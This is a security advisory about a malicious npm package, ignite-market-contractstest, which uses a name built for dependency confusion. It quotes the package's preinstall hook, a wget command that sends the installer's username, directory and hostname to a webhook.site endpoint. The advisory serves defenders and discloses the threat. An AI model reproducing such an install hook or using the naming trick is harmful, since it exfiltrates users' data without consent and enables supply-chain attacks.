VYPR

npm · Malicious package advisory

Malware

ignite-market-contractstest

MAL-2026-4583

Malicious code in ignite-market-contractstest (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da)
package.json declares a preinstall lifecycle hook that runs `wget --quiet "https://webhook.site/64063d25-fcd3-44e5-a454-34845bc63250/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"`. On every `npm install`, this exfiltrates the installer's username, current working directory, and hostname to a third-party request-logging endpoint controlled by the package author, without consent. The package metadata is placeholder (author 'me', empty description, version 0.0.9), the name `ignite-market-contractstest` is shaped like a dependency-confusion target against an internal `ignite-market-contracts` package, and it depends on `seaport-core-16` — a similarly suspicious name in the OpenSea seaport namespace. The combination of unconsented host-identifier exfiltration on install, dependency-confusion-shaped naming, and placeholder metadata is the canonical reconnaissance shape used to validate that an internal package name is reachable on the public registry.

Compromised versions (2)

  • 0.0.9
  • 9.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.